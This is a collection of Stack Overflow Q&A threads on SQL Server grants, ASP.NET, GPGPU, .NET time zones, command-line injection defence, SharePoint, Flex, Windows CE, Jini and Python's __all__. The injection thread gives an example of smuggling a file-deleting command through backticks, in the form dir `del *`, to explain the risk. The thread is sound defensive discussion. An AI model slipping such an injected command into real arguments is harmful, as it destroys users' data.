PRINT 'Granting access to user ' + @username + ' on the following objects:'
DECLARE c CURSOR FOR
SELECT name FROM sysobjects WHERE type IN('U', 'V', 'SP', 'P') ORDER BY name
OPEN c
FETCH NEXT FROM c INTO @on
WHILE @@FETCH_STATUS = 0
BEGIN
SET @count = @count + 1
EXEC('GRANT ALL ON [' + @on + '] TO [' + @username + ']')
--PRINT 'GRANT ALL ON [' + @on + '] TO ' + @username
PRINT @on
FETCH NEXT FROM c INTO @on
END
CLOSE c
DEALLOCATE c
PRINT 'Granted access to ' + cast(@count as varchar(4)) + ' object(s).'
GO
A: use [YourDb]
GO
exec sp_MSforeachtable @command1=
"GRANT DELETE, INSERT, REFERENCES, SELECT, UPDATE ON ? TO Admins, Mgmt",
@whereand = " and o.name like 'tbl_%'"
GO
use [YourDb]
GO
exec sp_MSforeachtable @command1=
"GRANT REFERENCES, SELECT ON ? TO Employee, public",
@whereand = " and o.name like 'tbl_%'"
GO
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44780",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: How do you get the current image name from an ASP.Net website? Scenario: You have an ASP.Net webpage that should display the next image in a series of images. If 1.jpg is currently loaded, the refresh should load 2.jpg.
Assuming I would use this code, where do you get the current images name.
string currImage = MainPic.ImageUrl.Replace(".jpg", "");
currImage = currImage.Replace("~/Images/", "");
int num = (Convert.ToInt32(currImage) + 1) % 3;
MainPic.ImageUrl = "~/Images/" + num.ToString() + ".jpg";
The problem with the above code is that the webpage used is the default site with the image set to 1.jpg, so the loaded image is always 2.jpg.
So in the process of loading the page, is it possible to pull the last image used from the pages properties?
A: You can store data in your page's ViewState dictionary
So in your Page_Load you could write something like...
int lastPicNum = ViewState["lastPic"] == null ? 0 : (int)ViewState["lastPic"];
lastPicNum++;
MainPic.ImageUrl = string.Format("~/Images/{0}.jpg", lastPicNum);
ViewState["lastPic"] = lastPicNum;
you should get the idea.
And if you're programming ASP.NET and still don't understand how ViewState and web forms work, you should read this MSDN article
Understanding ViewState from the beginning will help with a lot of ASP.NET gotchas as well.
A: int num = 1;
if(Session["ImageNumber"] != null)
{
num = Convert.ToInt32(Session["ImageNumber"]) + 1;
}
Session["ImageNumber"] = num;
A: You'll have to hide the last value in a HiddenField or ViewState or somewhere like that...
A: If you need to advance to the next image in the sequence when the user hits F5 or a similar refresh button, then you need to store the last image id in some server-side storage, or in a cookie. Use a Session variable or similar.
A: It depends on how long you want it to persist (remember) the last viewed value. My preferred choice would be the SESSION.
A: @chakrit
Does this really work when refreshing the page?
I thought the ViewState was stored on the page and had to be sent to the server on a postback; with a refresh, that is not happening.
A: @John ah Sorry I thought that your "refresh" meant postbacks.
In that case, just use a Session variable.
FYI, I suggested you use the ViewState dictionary instead of Session because the variable is used only inside that single page, so it shouldn't be a session-wide variable; that's bad practice.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44787",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How well do common programming tasks translate to GPUs? I have recently begun working on a project to establish how best to leverage the processing power available in modern graphics cards for general programming. It seems that the field of general-purpose GPU programming (GPGPU) has a large bias towards scientific applications with a lot of heavy math, as this fits well with the GPU computational model. This is all good and well, but most people don't spend all their time running simulation software and the like, so we figured it might be possible to create a common foundation for easily building GPU-enabled software for the masses.
This leads to the question I would like to pose: what are the most common types of work performed by programs? It is not a requirement that the work translate extremely well to GPU programming, as we are willing to accept modest performance improvements (better a little than nothing, right?).
There are a couple of subjects we have in mind already:
*
*Data management - Manipulation of large amounts of data from databases
and otherwise.
*Spreadsheet type programs (Is somewhat related to the above).
*GUI programming (Though it might be impossible to get access to the
relevant code).
*Common algorithms like sorting and searching.
*Common collections (And integrating them with data manipulation
algorithms)
Which other coding tasks are very common? I suspect a lot of the code being written is of the category of inventory management and otherwise tracking of real 'objects'.
As I have no industry experience I figured there might be a number of basic types of code which is done more often than I realize but which just doesn't materialize as external products.
Both high level programming tasks as well as specific low level operations will be appreciated.
A: General programming translates terribly to GPUs. GPUs are dedicated to performing fairly simple tasks on streams of data at a massive rate, with massive parallelism. They do not deal well with the rich data and control structures of general programming, and there's no point trying to shoehorn that into them.
A:
General programming translates terribly to GPUs. GPUs are dedicated to performing fairly simple tasks on streams of data at a massive rate, with massive parallelism. They do not deal well with the rich data and control structures of general programming, and there's no point trying to shoehorn that into them.
This isn't too far away from my impression of the situation but at this point we are not concerning ourselves too much with that. We are starting out by getting a broad picture of which options we have to focus on. After that is done we will analyse them a bit deeper and find out which, if any, are plausible options. If we end up determining that it is impossible to do anything within the field, and we are only increasing everybody's electricity bill then that is a valid result as well.
A: Things that modern computers do a lot of, where a little benefit could go a long way? Let's see...
*
*Data management: relational database management could benefit from faster relational joins (especially joins involving a large number of relations). Involves massive homogeneous data sets.
*Tokenising, lexing, parsing text.
*Compilation, code generation.
*Optimisation (of queries, graphs, etc).
*Encryption, decryption, key generation.
*Page layout, typesetting.
*Full text indexing.
*Garbage collection.
A: I do a lot of simplifying of configuration. That is I wrap the generation/management of configuration values inside a UI. The primary benefit is I can control work flow and presentation to make it simpler for non-techie users to configure apps/sites/services.
A: You might want to take a look at the March/April issue of ACM's Queue magazine, which has several articles on GPUs and how best to use them (besides doing graphics, of course).
A: The other thing to consider when using a GPU is the bus speed. Most graphics cards are designed to have higher bandwidth when transferring data from the CPU out to the GPU, as that's what they do most of the time. The bandwidth from the GPU back up to the CPU, which is needed to return results etc., isn't as fast. So they work best in a pipelined mode.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44789",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: How can I determine whether a given date is in Daylight Saving Time for a given timezone in .NET 2.0? I'm on .NET 2.0, running under Medium Trust (so TimeZoneInfo and the Registry are not allowed options). I'm asking the user for two dates and a time zone, and would really love to be able to automatically determine whether I need to adjust the time zone for DST.
This probably isn't even a valid scenario unless I have some very robust support, a la TimeZoneInfo, to differentiate between all of the different varieties of Time Zones in the first place.
A: In .NET 2.0 you have to code this yourself. It involves researching daylight savings time laws in various regions and building that into your own data structures. The problem is somewhat simplified if you only care about a subset of time zones, for example just in the USA, but if you need all global time zones, you have a lot of work to do, and then the code has to be updated every few years when the laws change. Even the new time zone objects in the latest version of .NET will require windows updates to keep them correct as laws change.
Look here, here, and here for more info.
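One narrow built-in exception worth noting: if the zone in question happens to be the machine's own local zone, .NET 2.0 can already answer the DST question (this doesn't help for an arbitrary user-selected zone, which is the hard part):
using System;

// Only valid for the local time zone of the machine this code runs on.
DateTime date = new DateTime(2008, 7, 1);
bool isDst = TimeZone.CurrentTimeZone.IsDaylightSavingTime(date);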
A: The TZ Database is a public domain database of timezone rules that is very well maintained. There is also a compiled format for the data they provide, and there are lots of libraries available to read the compiled data, like this one: ZoneInfo (tz database / Olson database) .NET API
A: Excellent timezone library here: TZ4Net
A: Well, since TimeZoneInfo is excluded, you're probably not going to find a solution in the framework itself (but don't quote me on that).
In which case, have you considered reflectoring the TimeZoneInfo class and using what you find there?
A: @Domenic, I've considered, but I'd prefer to stay legal, and I'm fairly sure the information would have to be embedded into the framework anyway, or grabbed from the registry in some sneaky way that doesn't require permissions...
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44795",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Preventing Command Line Injection Attacks We're currently building an application that executes a number of external tools. We often have to pass information entered into our system by users to these tools.
Obviously, this is a big security nightmare waiting to happen.
Unfortunately, we've not yet found any classes in the .NET Framework that execute command line programs while providing the same kind of guards against injection attacks as the IDbCommand objects do for databases.
Right now, we're using a very primitive string substitution which I suspect is rather insufficient:
protected virtual string Escape(string value)
{
    return value
        .Replace(@"\", @"\\")
        .Replace(@"$", @"\$")
        .Replace(@"""", @"\""")
        .Replace("`", "'")
        ;
}
What do you guys do to prevent command-line injection attacks? We're planning to implement a regex that is very strict and only allows a very small subset of characters through, but I was wondering if there was a better way.
Some clarifications:
*
*Some of these tools do not have APIs we can program against. If they did, we wouldn't be having this problem.
*The users don't pick tools to execute, they enter meta-data which the tools we've chosen use (for example, injecting meta data such as copyright notices into target files).
A: Are you executing the programs directly or going through the shell? If you always launch an external program by giving the full path name to the executable and leaving the shell out of the equation, then you aren't really susceptible to any kind of command line injection.
EDIT: DrFloyd, the shell is responsible for evaluating things like the backtick. No shell, no shell evaluation. Obviously, you've still got to be aware of any potential security gotchas in the programs that you're calling -- but I don't think this question is about that.
A: When you Process.Start a new process, supply the arguments via the ProcessStartInfo.Arguments property instead of building the whole command line yourself.
Haven't got time for a proper test, but I think that should help guard it to some level.
Will test this out tomorrow.
EDIT: Ah, someone beat me to it again. But here's another point: try using the process's standard input stream (Process.StandardInput) to supply data instead of passing parameters. Is that a possible solution? I.e., fix the command so it reads from the CON device, and you then supply the data via the input stream instead.
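A minimal C# sketch of launching the tool directly with no shell in between (the tool path and userValue are hypothetical placeholders; see the qEscape answer below for fuller Windows quoting rules):
using System.Diagnostics;

ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = @"C:\tools\metadatatool.exe"; // full path to the executable, hypothetical
psi.Arguments = "\"" + userValue.Replace("\"", "\\\"") + "\""; // naive quoting only
psi.UseShellExecute = false; // no cmd.exe, so `backticks`, & and | are never interpreted
Process.Start(psi);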
A: In C++ on Windows, you just escape \ and " where needed, quote the argument and ShellExecute it. Then, everything inside the quotes should be treated as text.
This should illustrate:
#include <iostream>
#include <string>
#include <windows.h>
#include <cstdlib>
using namespace std;
// Escape and quote string for use as Windows command line argument
string qEscape(const string& s) {
    string result("\"");
    for (string::const_iterator i = s.begin(); i != s.end(); ++i) {
        const char c = *i;
        const string::const_iterator next = i + 1;
        if (c == '"' || (c == '\\' && (next == s.end() || *next == '"'))) {
            result += '\\';
        }
        result += c;
    }
    result += '"';
    return result;
}
int main() {
    // Argument value to pass: c:\program files\test\test.exe
    const string safe_program = qEscape("c:\\program files\\test\\test.exe");
    cout << safe_program << " ";
    // Argument value to pass: You're the "best" around.
    const string safe_arg0 = qEscape("You're the \"best\" around.");
    // Argument value to pass: "Nothing's" gonna ever keep you down.
    const string safe_arg1 = qEscape("\"Nothing's\" gonna ever keep you down.");
    const string safe_args = safe_arg0 + " " + safe_arg1;
    cout << safe_args << "\n\n";
    // c:\program files\test\ to pass.
    const string bs_at_end_example = qEscape("c:\\program files\\test\\");
    cout << bs_at_end_example << "\n\n";
    const INT_PTR result = reinterpret_cast<INT_PTR>(ShellExecute(NULL, "open", safe_program.c_str(), safe_args.c_str(), NULL, SW_SHOWNORMAL));
    if (result < 33) {
        cout << "ShellExecute failed with Error code " << result << "\n";
        return EXIT_FAILURE;
    }
}
But, with any method you use, you should test the hell out of it to see that it does really prevent injection.
A: Don't use a blacklist for preventing injections. If there are n ways to inject code, you'll think of n - m where m > 0.
Use a whitelist of accepted parameters (or patterns). It is much more restrictive by nature, but that's the nature of security.
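A sketch of what such a whitelist might look like in C# (the allowed character set here is an assumption; derive yours from what each field legitimately needs):
using System.Text.RegularExpressions;

// Accept only characters the field actually requires; reject everything else.
static bool IsSafeMetadataValue(string value)
{
    return Regex.IsMatch(value, @"^[A-Za-z0-9 .,()\-]{1,200}$");
}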
A: Well, if you can invoke the tools programmatically without the command line, that would probably be your best option. Otherwise, you could potentially execute the command line tool via a user that has absolutely no access to do anything (except perhaps a single directory that they can't do any harm with)... though that may end up breaking the tool, depending on what the tool does.
Just note, I have never had to face this problem, because I have never actually had to invoke a command line tool from an externally facing application where the tool requires input from the user.
A: Hmmm...
It sounds like you have a list of valid commands that the users are able to execute. But you don't want them to execute them all.
You could try to take the actual command line and verify the file exists in the "safe" location at least.
You could also solve the problem with more interface, provide a drop down of commands and parameters they could use. It's more work on your end, but it ultimately helps the users.
A:
Are you executing the programs directly or going through the shell? If you always launch an external program by giving the full path name to the executable and leaving the shell out of the equation, then you aren't really susceptible to any kind of command line injection.
@Curt Hagenlocher The backtick can kill you. If the Windows system is set up "wrong", or the unix system allows it, a dir `del *` will first execute the del * command and then use the output in place of the `del *`, which in this case won't matter, because there is nothing left to dir (or ls)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44799",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: Read/write Person metadata from a Word doc stored in SharePoint using VBA or VSTO? Scenario: Document library in SharePoint with column x of "Person or Group" type. From within a VBA macro (or VSTO add-in) we're trying to access the MetaProperty on the document to set/get the user name. Any attempt to access the value via the ContentTypeProperties collection throws a
Type MisMatch error (13).
The Type property of the MetaProperty object says it's msoMetaPropertyTypeUser. I cannot find any examples of how to work with MetaProperties of this type. Anyone have any experience with this?
Thanks!
A: You should be able to just do something like this:
using (SPSite site = new SPSite("http://yoursite/subsite"))
{
    using (SPWeb web = site.OpenWeb())
    {
        SPList list = web.Lists["DocLibraryName"];
        SPListItemCollection items = list.GetItems(list.Views["All Documents"]);
        foreach (SPListItem item in items)
        {
            item["Modified By"] = "Updated Value";
            item.Update(); // persist the change
        }
    }
}
Any metadata for a document should be available by indexing the column name of the SPListItem.
A: I did it.
The trick here is that if you put a string corresponding to the user's index in the MOSS user list into the document's custom property, MOSS will recognize it and map the field to the corresponding user.
So you just need to call http:///_vti_bin/usergroup.asmx, use the GetUserInfo function, and retrieve the user index (ID) from it.
MOSSusergroup.UserGroup userGroupService = new MOSSusergroup.UserGroup();
userGroupService.Credentials = System.Net.CredentialCache.DefaultCredentials;
System.Xml.XmlNode node = userGroupService.GetUserInfo(userLogin);
string index = node.FirstChild.Attributes["ID"].Value;
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44803",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Flex and ADO.NET Data Services...anyone done it? Has anyone used ADO.NET Data Services as a data source for Adobe Flex applications? If so, any success stories or tragedies to avoid? If you did use it, how did you handle security?
A: I use WebORB for .NET to do Flex remoting and then use DLINQ on the server. One tricky thing about using LINQ with WebORB is that WebORB uses Reflection to automatically retrieve all the relationships of the object(s) you return to Flex. This causes severe time penalties as LINQ uses lazy loading to load relationships. To prevent this from happening, I do something like the following:
Override your DataContext's constructor and add the following code:
this.DeferredLoadingEnabled = false;
DataLoadOptions dlo = new DataLoadOptions();
dlo.LoadWith<Order>(q => q.Payments);
dlo.LoadWith<Order>(q => q.Customer);
this.LoadOptions = dlo;
This tells the DataContext to disable deferred loading of relationships and specifically instructs it to load just the relationships you want, without lazy loading. That way, WebORB isn't causing any lazy loading to happen through Reflection and the number of relationships being transferred to Flex is kept at a minimum.
Hope this helps you in some way. It's definitely one of those little "gotchas" when working with Flex/WebORB and LINQ.
A: Yes, we use Flex with .Net web services extensively.
Flex can't handle .Net DataSets, or indeed much by way of complex xml types. We found that it was best to keep to relatively simple xml output.
However, if you do that, it can handle .Net web service output fine:
<mx:WebService id="myDataService" showBusyCursor="true">
<mx:operation name="WebMethodName"
resultFormat="object"
result="functionFiredOnComplete();">
</mx:operation>
</mx:WebService>
public function load():void
{
myDataService.loadWSDL( "web method's wsdl" );
myDataService.WebMethodName.send( params );
}
public function functionFiredOnComplete():void
{
// get data
var myData:Object = myDataService.WebMethodName.lastResult;
...
A: He asked about ADO.NET Data Services, not web services.
A: Flex can only do GET and POST, and it doesn't understand HTTP response messages.
So in order to have Flex talk to ADO.NET Data Services you have to either:
1. use a proxy server, but you have to find or build one yourself
2. modify the incoming requests and use $method=MERGE and so on (same as a proxy)
3. use another AS3 HTTPService client; there are some open-source initiatives
Then you have to figure out how to post data, and it costs a lot of time when you want to create a new record with JSON and specify an Id which links to another table. This is because you can't just update the integer; instead you have to create a link string, which doesn't feel easy.
So of course it can be done, but out of the box you really have to build it yourself. I know that Flash Builder 4 will come with a REST import, which could speed things up, but I have no experience with that.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44817",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Default smart device project can't find dependencies When running the default c++ project in Visual Studio for a Windows CE 5.0 device, I get an error complaining about missing resources. Depends says that my executable needs aygshell.dll (the Windows Mobile shell), and CoreDll.dll. Does this mean that my executable can only be run on Windows Mobile devices, instead of any generic Windows CE installation? If that's the case, how do I create an executable targeting generic WinCE?
A: Depends what you mean by a generic Windows CE installation. Windows CE itself is a modularised operating system, so different devices can have different modules included. Therefore each Windows CE device can have a radically different OS installed (headless even).
Coredll is the standard "common" library that gets included in a Windows CE installation; however, it can contain different components depending on the other modules in the system.
If you want to target a relatively standard version of Windows CE either target the Standard SDK set of components, or go for a Windows Mobile platform.
If you have an SDK then install and use that. If none is available then you can generate an SDK using Platform Builder and the OS project files.
To get your application to work on a non-Windows Mobile installation of Windows CE you just have to remove the code that uses the aygshell library, and not link to those libraries.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44821",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Is JINI at all active anymore? Everyone I talk to who knows (knew) about it claims it was the greatest thing since sliced bread. Why did it fail? Or, if it didn't fail, who's using it now?
A: Check out GigaSpaces. It's a quite successful Jini/Javaspaces implementation.
I think Jini has a great model, but it is stuck with Java. Web services are more appealing because they work with standardized protocols, even though Jini service discovery is more natural.
A: Things have definitely quieted down for the idea. Which is strange, since you'd think its goals are even more relevant now.
http://www.jini.org/wiki/Category:News
A: old question, but JINI was given to Apache and became Apache River project. However, that project is now retired.
A: Zeroconf and other discovery protocols are similarly referred to as the greatest thing since sliced bread; it's just that the flavor keeps changing.
A: The jewel in the crown of Jini was it's JavaSpaces service IMO. Sad that Sun seem to have abandoned it. It still exists as Apache River, but is now retired.
A: My two cents... Jini was/is nice, but I think it tried to be a Java-centric CORBA back in the day when corporations were beginning to be reluctant to pay big bucks for what CORBA brought to the table. WS-* specs began to acquire the "accepted-solution" mind-share in the industry. I think there was a small window where Jini could have grabbed substantial market share, but it never happened. Sun wanted too much money for what Jini brought to the table compared to other alternatives. I would love to hear from folks that disagree! My opinion is that Jini is sound tech, but business-wise has no future in the enterprise. It may find a niche elsewhere, depending on what Oracle decides to do with it.
A: Jini was an amazing technology. The only reason Sun pushed EJB systems was that it allowed Sun to sell more hardware, as EJB ran best on high-powered machines (due to shared state and database access). At the time (1999) Jini allowed much better scalability and ran well on commodity hardware, so it made sense for Sun not to promote Jini. It's a shame, as I kept wondering when someone would release an open-source, easy-to-use Jini server like JBoss did with J2EE. I did however save companies a lot of time and money by using the Jini techniques (based on Linda tuple spaces) and applying them to writing software systems using tuple spaces implemented in other ways.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44824",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: What does __all__ mean in Python? I see __all__ in __init__.py files. What does it do?
A: It also changes what pydoc will show:
module1.py
a = "A"
b = "B"
c = "C"
module2.py
__all__ = ['a', 'b']
a = "A"
b = "B"
c = "C"
$ pydoc module1
Help on module module1:
NAME
module1
FILE
module1.py
DATA
a = 'A'
b = 'B'
c = 'C'
$ pydoc module2
Help on module module2:
NAME
module2
FILE
module2.py
DATA
__all__ = ['a', 'b']
a = 'A'
b = 'B'
I declare __all__ in all my modules, as well as underscoring internal details; these really help when using things you've never used before in live interpreter sessions.
A: __all__ customizes * in from <module> import *
and from <package> import *.
A module is a .py file meant to be imported.
A package is a directory with a __init__.py file. A package usually contains modules.
MODULES
""" cheese.py - an example module """
__all__ = ['swiss', 'cheddar']
swiss = 4.99
cheddar = 3.99
gouda = 10.99
__all__ lets humans know the "public" features of a module.[@AaronHall] Also, pydoc recognizes them.[@Longpoke]
from module import *
See how swiss and cheddar are brought into the local namespace, but not gouda:
>>> from cheese import *
>>> swiss, cheddar
(4.99, 3.99)
>>> gouda
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'gouda' is not defined
Without __all__, any symbol (that doesn't start with an underscore) would have been available.
Imports without * are not affected by __all__
import module
>>> import cheese
>>> cheese.swiss, cheese.cheddar, cheese.gouda
(4.99, 3.99, 10.99)
from module import names
>>> from cheese import swiss, cheddar, gouda
>>> swiss, cheddar, gouda
(4.99, 3.99, 10.99)
import module as localname
>>> import cheese as ch
>>> ch.swiss, ch.cheddar, ch.gouda
(4.99, 3.99, 10.99)
PACKAGES
In the __init__.py file of a package __all__ is a list of strings with the names of public modules or other objects. Those features are available to wildcard imports. As with modules, __all__ customizes the * when wildcard-importing from the package.[@MartinStettner]
Here's an excerpt from the Python MySQL Connector __init__.py:
__all__ = [
'MySQLConnection', 'Connect', 'custom_error_exception',
# Some useful constants
'FieldType', 'FieldFlag', 'ClientFlag', 'CharacterSet', 'RefreshOption',
'HAVE_CEXT',
# Error handling
'Error', 'Warning',
...etc...
]
The default case, asterisk with no __all__ for a package, is complicated, because the obvious behavior would be expensive: to use the file system to search for all modules in the package. Instead, in my reading of the docs, only the objects defined in __init__.py are imported:
If __all__ is not defined, the statement from sound.effects import * does not import all submodules from the package sound.effects into the current namespace; it only ensures that the package sound.effects has been imported (possibly running any initialization code in __init__.py) and then imports whatever names are defined in the package. This includes any names defined (and submodules explicitly loaded) by __init__.py. It also includes any submodules of the package that were explicitly loaded by previous import statements.
And lastly, a venerated tradition for stack overflow answers, professors, and mansplainers everywhere, is the bon mot of reproach for asking a question in the first place:
Wildcard imports ... should be avoided, as they [confuse] readers and many automated tools.
[PEP 8, @ToolmakerSteve]
A: It's a list of public objects of that module, as interpreted by import *. It overrides the default of hiding everything that begins with an underscore.
A:
Explain all in Python?
I keep seeing the variable __all__ set in different __init__.py files.
What does this do?
What does __all__ do?
It declares the semantically "public" names from a module. If there is a name in __all__, users are expected to use it, and they can have the expectation that it will not change.
It also will have programmatic effects:
import *
__all__ in a module, e.g. module.py:
__all__ = ['foo', 'Bar']
means that when you import * from the module, only those names in the __all__ are imported:
from module import * # imports foo and Bar
Documentation tools
Documentation and code autocompletion tools may (in fact, should) also inspect the __all__ to determine what names to show as available from a module.
__init__.py makes a directory a Python package
From the docs:
The __init__.py files are required to make Python treat the directories as containing packages; this is done to prevent directories with a common name, such as string, from unintentionally hiding valid modules that occur later on the module search path.
In the simplest case, __init__.py can just be an empty file, but it can also execute initialization code for the package or set the __all__ variable.
So the __init__.py can declare the __all__ for a package.
Managing an API:
A package is typically made up of modules that may import one another, but that are necessarily tied together with an __init__.py file. That file is what makes the directory an actual Python package. For example, say you have the following files in a package:
package
├── __init__.py
├── module_1.py
└── module_2.py
Let's create these files with Python so you can follow along - you could paste the following into a Python 3 shell:
from pathlib import Path
package = Path('package')
package.mkdir()
(package / '__init__.py').write_text("""
from .module_1 import *
from .module_2 import *
""")
package_module_1 = package / 'module_1.py'
package_module_1.write_text("""
__all__ = ['foo']
imp_detail1 = imp_detail2 = imp_detail3 = None
def foo(): pass
""")
package_module_2 = package / 'module_2.py'
package_module_2.write_text("""
__all__ = ['Bar']
imp_detail1 = imp_detail2 = imp_detail3 = None
class Bar: pass
""")
And now you have presented a complete api that someone else can use when they import your package, like so:
import package
package.foo()
package.Bar()
And the package won't have all the other implementation details you used when creating your modules cluttering up the package namespace.
__all__ in __init__.py
After more work, maybe you've decided that the modules are too big (like many thousands of lines?) and need to be split up. So you do the following:
package
├── __init__.py
├── module_1
│ ├── foo_implementation.py
│ └── __init__.py
└── module_2
├── Bar_implementation.py
└── __init__.py
First make the subpackage directories with the same names as the modules:
subpackage_1 = package / 'module_1'
subpackage_1.mkdir()
subpackage_2 = package / 'module_2'
subpackage_2.mkdir()
Move the implementations:
package_module_1.rename(subpackage_1 / 'foo_implementation.py')
package_module_2.rename(subpackage_2 / 'Bar_implementation.py')
create __init__.pys for the subpackages that declare the __all__ for each:
(subpackage_1 / '__init__.py').write_text("""
from .foo_implementation import *
__all__ = ['foo']
""")
(subpackage_2 / '__init__.py').write_text("""
from .Bar_implementation import *
__all__ = ['Bar']
""")
And now you still have the api provisioned at the package level:
>>> import package
>>> package.foo()
>>> package.Bar()
<package.module_2.Bar_implementation.Bar object at 0x7f0c2349d210>
And you can easily add things to your API that you can manage at the subpackage level instead of the subpackage's module level. If you want to add a new name to the API, you simply update the __init__.py, e.g. in module_2:
from .Bar_implementation import *
from .Baz_implementation import *
__all__ = ['Bar', 'Baz']
And if you're not ready to publish Baz in the top level API, in your top level __init__.py you could have:
from .module_1 import * # also constrained by __all__'s
from .module_2 import * # in the __init__.py's
__all__ = ['foo', 'Bar'] # further constraining the names advertised
and if your users are aware of the availability of Baz, they can use it:
import package
package.Baz()
but if they don't know about it, other tools (like pydoc) won't inform them.
You can later change that when Baz is ready for prime time:
from .module_1 import *
from .module_2 import *
__all__ = ['foo', 'Bar', 'Baz']
Prefixing _ versus __all__:
By default, Python will export all names that do not start with an _ when imported with import *. As demonstrated by the shell session here, import * does not bring in the _us_non_public name from the us.py module:
$ cat us.py
USALLCAPS = "all caps"
us_snake_case = "snake_case"
_us_non_public = "shouldn't import"
$ python
Python 3.10.0 (default, Oct 4 2021, 17:55:55) [GCC 10.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from us import *
>>> dir()
['USALLCAPS', '__annotations__', '__builtins__', '__doc__', '__loader__', '__name__', '__package__', '__spec__', 'us_snake_case']
You certainly could rely on this mechanism. Some packages in the Python standard library, in fact, do rely on this, but to do so, they alias their imports, for example, in ctypes/__init__.py:
import os as _os, sys as _sys
Using the _ convention can be more elegant because it removes the redundancy of naming the names again. But it adds the redundancy for imports (if you have a lot of them) and it is easy to forget to do this consistently - and the last thing you want is to have to indefinitely support something you intended to only be an implementation detail, just because you forgot to prefix an _ when naming a function.
I personally write an __all__ early in my development lifecycle for modules so that others who might use my code know what they should use and not use.
Most packages in the standard library also use __all__.
When avoiding __all__ makes sense
It makes sense to stick to the _ prefix convention in lieu of __all__ when:
*
*You're still in early development mode and have no users, and are constantly tweaking your API.
*Maybe you do have users, but you have unittests that cover the API, and you're still actively adding to the API and tweaking in development.
An export decorator
The downside of using __all__ is that you have to write the names of functions and classes being exported twice - and the information is kept separate from the definitions. We could use a decorator to solve this problem.
I got the idea for such an export decorator from David Beazley's talk on packaging. This implementation seems to work well in CPython's traditional importer. If you have a special import hook or system, I do not guarantee it, but if you adopt it, it is fairly trivial to back out - you'll just need to manually add the names back into the __all__
So in, for example, a utility library, you would define the decorator:
import sys
def export(fn):
mod = sys.modules[fn.__module__]
if hasattr(mod, '__all__'):
mod.__all__.append(fn.__name__)
else:
mod.__all__ = [fn.__name__]
return fn
and then, where you would define an __all__, you do this:
$ cat > main.py
from lib import export
__all__ = [] # optional - we create a list if __all__ is not there.
@export
def foo(): pass
@export
def bar():
'bar'
def main():
print('main')
if __name__ == '__main__':
main()
And this works fine whether run as main or imported by another function.
$ cat > run.py
import main
main.main()
$ python run.py
main
And API provisioning with import * will work too:
$ cat > run.py
from main import *
foo()
bar()
main() # expected to error here, not exported
$ python run.py
Traceback (most recent call last):
File "run.py", line 4, in <module>
main() # expected to error here, not exported
NameError: name 'main' is not defined
A: This is defined in PEP8 here:
Global Variable Names
(Let's hope that these variables are meant for use inside one module only.) The conventions are about the same as those for functions.
Modules that are designed for use via from M import * should use the __all__ mechanism to prevent exporting globals, or use the older convention of prefixing such globals with an underscore (which you might want to do to indicate these globals are "module non-public").
PEP8 provides coding conventions for the Python code comprising the standard library in the main Python distribution. The more you follow this, closer you are to the original intent.
A: I'm just adding this to be precise:
All other answers refer to modules. The original question explicitly mentioned __all__ in __init__.py files, so this is about Python packages.
Generally, __all__ only comes into play when the from xxx import * variant of the import statement is used. This applies to packages as well as to modules.
The behaviour for modules is explained in the other answers. The exact behaviour for packages is described here in detail.
In short, __all__ on the package level does approximately the same thing as for modules, except it deals with modules within the package (in contrast to specifying names within the module). So __all__ specifies all modules that shall be loaded and imported into the current namespace when you use from package import *.
The big difference is, that when you omit the declaration of __all__ in a package's __init__.py, the statement from package import * will not import anything at all (with exceptions explained in the documentation, see link above).
On the other hand, if you omit __all__ in a module, the "starred import" will import all names (not starting with an underscore) defined in the module.
A: Short answer
__all__ affects from <module> import * statements.
Long answer
Consider this example:
foo
├── bar.py
└── __init__.py
In foo/__init__.py:
*
*(Implicit) If we don't define __all__, then from foo import * will only import names defined in foo/__init__.py.
*(Explicit) If we define __all__ = [], then from foo import * will import nothing.
*(Explicit) If we define __all__ = [ <name1>, ... ], then from foo import * will only import those names.
Note that in the implicit case, python won't import names starting with _. However, you can force importing such names using __all__.
You can view the Python document here.
A: Linked to, but not explicitly mentioned here, is exactly when __all__ is used. It is a list of strings defining what symbols in a module will be exported when from <module> import * is used on the module.
For example, the following code in a foo.py explicitly exports the symbols bar and baz:
__all__ = ['bar', 'baz']
waz = 5
bar = 10
def baz(): return 'baz'
These symbols can then be imported like so:
from foo import *
print(bar)
print(baz)
# The following will trigger an exception, as "waz" is not exported by the module
print(waz)
If the __all__ above is commented out, this code will then execute to completion, as the default behaviour of import * is to import all symbols that do not begin with an underscore, from the given namespace.
Reference: https://docs.python.org/tutorial/modules.html#importing-from-a-package
NOTE: __all__ affects the from <module> import * behavior only. Members that are not mentioned in __all__ are still accessible from outside the module and can be imported with from <module> import <member>.
A: __all__ is used to document the public API of a Python module. Although it is optional, __all__ should be used.
Here is the relevant excerpt from the Python language reference:
The public names defined by a module are determined by checking the module’s namespace for a variable named __all__; if defined, it must be a sequence of strings which are names defined or imported by that module. The names given in __all__ are all considered public and are required to exist. If __all__ is not defined, the set of public names includes all names found in the module’s namespace which do not begin with an underscore character ('_'). __all__ should contain the entire public API. It is intended to avoid accidentally exporting items that are not part of the API (such as library modules which were imported and used within the module).
PEP 8 uses similar wording, although it also makes it clear that imported names are not part of the public API when __all__ is absent:
